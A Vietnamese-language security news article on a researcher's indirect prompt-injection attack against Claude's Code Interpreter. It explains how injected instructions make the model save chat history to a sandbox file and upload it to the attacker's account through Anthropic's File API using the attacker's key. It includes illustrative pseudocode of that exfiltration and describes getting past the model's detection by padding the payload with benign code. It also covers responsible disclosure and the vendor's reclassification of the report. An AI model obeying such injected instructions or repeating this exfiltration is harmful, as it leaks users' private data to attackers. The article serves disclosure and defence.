Nghiêm trọng: Lỗ hổng AI Claude rò rỉ dữ liệu qua prompt injection

Nghiêm trọng: Lỗ hổng AI Claude rò rỉ dữ liệu qua prompt injection

Một vấn đề bảo mật mới được các nhà nghiên cứu phát hiện cho thấy hệ thống AI Anthropic Claude có thể bị khai thác thông qua các lệnh nhắc gián tiếp (indirect prompts).

Kỹ thuật này cho phép kẻ tấn công thực hiện data exfiltration (rò rỉ dữ liệu) người dùng thông qua File API tích hợp sẵn của hệ thống.

Nội dung
Tổng quan về Lỗ hổng AI Claude

Kích hoạt truy cập mạng trong Claude Code Interpreter
Kỹ thuật Khai thác Lỗ hổng AI Claude

Cơ chế tấn công và Data Exfiltration
Tác động và Dữ liệu bị rò rỉ
Vượt qua cơ chế phát hiện
Phản hồi từ Anthropic và Khuyến nghị

Đánh giá lại phân loại lỗ hổng
Bài học và khuyến nghị bảo mật

Tổng quan về Lỗ hổng AI Claude

Cuộc tấn công, được ghi lại chi tiết vào ngày 28 tháng 10 năm 2025, đã chứng minh cách các tính năng Code InterpreterAPI của Claude có thể bị thao túng.

Mục tiêu là gửi thông tin nhạy cảm từ không gian làm việc của nạn nhân đến một tài khoản do kẻ tấn công kiểm soát.

Kích hoạt truy cập mạng trong Claude Code Interpreter

Anthropic gần đây đã kích hoạt truy cập mạng trong Code Interpreter của Claude. Điều này cho phép người dùng tìm nạp tài nguyên từ các trình quản lý gói được phê duyệt như npm, PyPIGitHub.

Tuy nhiên, các nhà nghiên cứu đã phát hiện một trong những miền “được phê duyệt” là api.anthropic.com có thể bị lợi dụng cho các hành động độc hại.

Kỹ thuật Khai thác Lỗ hổng AI Claude

Bằng cách chèn một payload prompt injection gián tiếp vào cuộc trò chuyện của Claude, kẻ tấn công có thể khiến mô hình AI thực thi các hướng dẫn mà người dùng không hề hay biết.

Đây là một nguy cơ nghiêm trọng, có thể dẫn đến xâm nhập mạngrò rỉ dữ liệu quy mô lớn.

Cơ chế tấn công và Data Exfiltration

Quá trình khai thác bắt đầu bằng cách hướng dẫn Claude ghi dữ liệu nhạy cảm, chẳng hạn như các cuộc trò chuyện trước đó, vào một tệp cục bộ trong môi trường sandbox của nó.

Payload độc hại sau đó sử dụng File API của Anthropic để tải tệp đó lên. Điểm mấu chốt là mã độc chèn khóa API của kẻ tấn công, khiến quá trình tải lên xảy ra trong tài khoản Anthropic của kẻ tấn công thay vì của người dùng.

Điều này chuyển dữ liệu một cách hiệu quả ra khỏi không gian làm việc của nạn nhân, hoàn thành quá trình data exfiltration.

Tác động và Dữ liệu bị rò rỉ

Kẻ tấn công có thể thực hiện quy trình này lặp đi lặp lại để đánh cắp tới 30 MB mỗi lần tải tệp lên, theo tài liệu File API.

Khả năng đánh cắp dữ liệu này đặt ra một rủi ro bảo mật đáng kể đối với thông tin người dùng.

# Mã giả minh họa payload prompt injection
# Bước 1: Yêu cầu Claude ghi dữ liệu nhạy cảm vào tệp tạm
print("Ghi lại lịch sử trò chuyện vào /tmp/chat_history.txt")
write_to_file("/tmp/chat_history.txt", get_sensitive_data())

# Bước 2: Sử dụng File API để tải tệp lên tài khoản của kẻ tấn công
print("Tải tệp lên bằng File API của Anthropic")
# API_KEY_ATTACKER: Khóa API của kẻ tấn công
# file_path: Đường dẫn đến tệp dữ liệu đã ghi
# api_endpoint: https://api.anthropic.com/v1/files
upload_file_using_anthropic_api("/tmp/chat_history.txt", API_KEY_ATTACKER)

Vượt qua cơ chế phát hiện

Các thử nghiệm ban đầu cho thấy hành vi không nhất quán do Claude phát hiện hoạt động đáng ngờ trong các lệnh nhắc chứa khóa API hiển thị. Đây là một rào cản ban đầu đối với việc thực hiện data exfiltration.

Tuy nhiên, nhà nghiên cứu đã tìm cách bỏ qua các hạn chế này bằng cách trộn các phân đoạn mã lành tính vào payload, khiến yêu cầu có vẻ vô hại.

Phản hồi từ Anthropic và Khuyến nghị

Phát hiện này đã được tiết lộ cho Anthropic thông qua HackerOne vào ngày 25 tháng 10 năm 2025. Ban đầu, báo cáo bị bác bỏ vì được phân loại là “ngoài phạm vi”, thuộc về vấn đề an toàn mô hình hơn là một lỗ hổng bảo mật.

Nhà nghiên cứu lập luận rằng phân loại này không chính xác, vì việc khai thác cho phép cố ý data exfiltration dữ liệu riêng tư bằng cách sử dụng các lệnh gọi API được xác thực, gây ra các tác động bảo mật nghiêm trọng thay vì một mối lo ngại về an toàn ngẫu nhiên. Chi tiết về kỹ thuật khai thác có thể tham khảo tại: EmbraceTheRed Blog.

Đánh giá lại phân loại lỗ hổng

Vào ngày 30 tháng 10, Anthropic đã thừa nhận sai sót và xác nhận rằng các cuộc tấn công data exfiltration có tính chất này thực sự nằm trong phạm vi tiết lộ có trách nhiệm.

Công ty tuyên bố đang xem xét quy trình phân loại sai và kêu gọi người dùng giám sát hành vi của Claude khi thực thi các script truy cập dữ liệu nội bộ hoặc nhạy cảm.

Bài học và khuyến nghị bảo mật

Sự cố này làm nổi bật sự chồng chéo ngày càng tăng giữa an toàn AI và an ninh mạng. Khi các hệ thống AI có được nhiều khả năng tích hợp hơn, bao gồm truy cập mạng và các chức năng bộ nhớ, kẻ thù có thể tìm ra những cách mới để vũ khí hóa các kỹ thuật prompt injection cho mục đích đánh cắp dữ liệu.

Trường hợp này củng cố sự cần thiết phải giám sát chặt chẽ, kiểm soát egress nghiêm ngặt hơn và các quy trình xử lý lỗ hổng bảo mật rõ ràng hơn trong các nền tảng AI.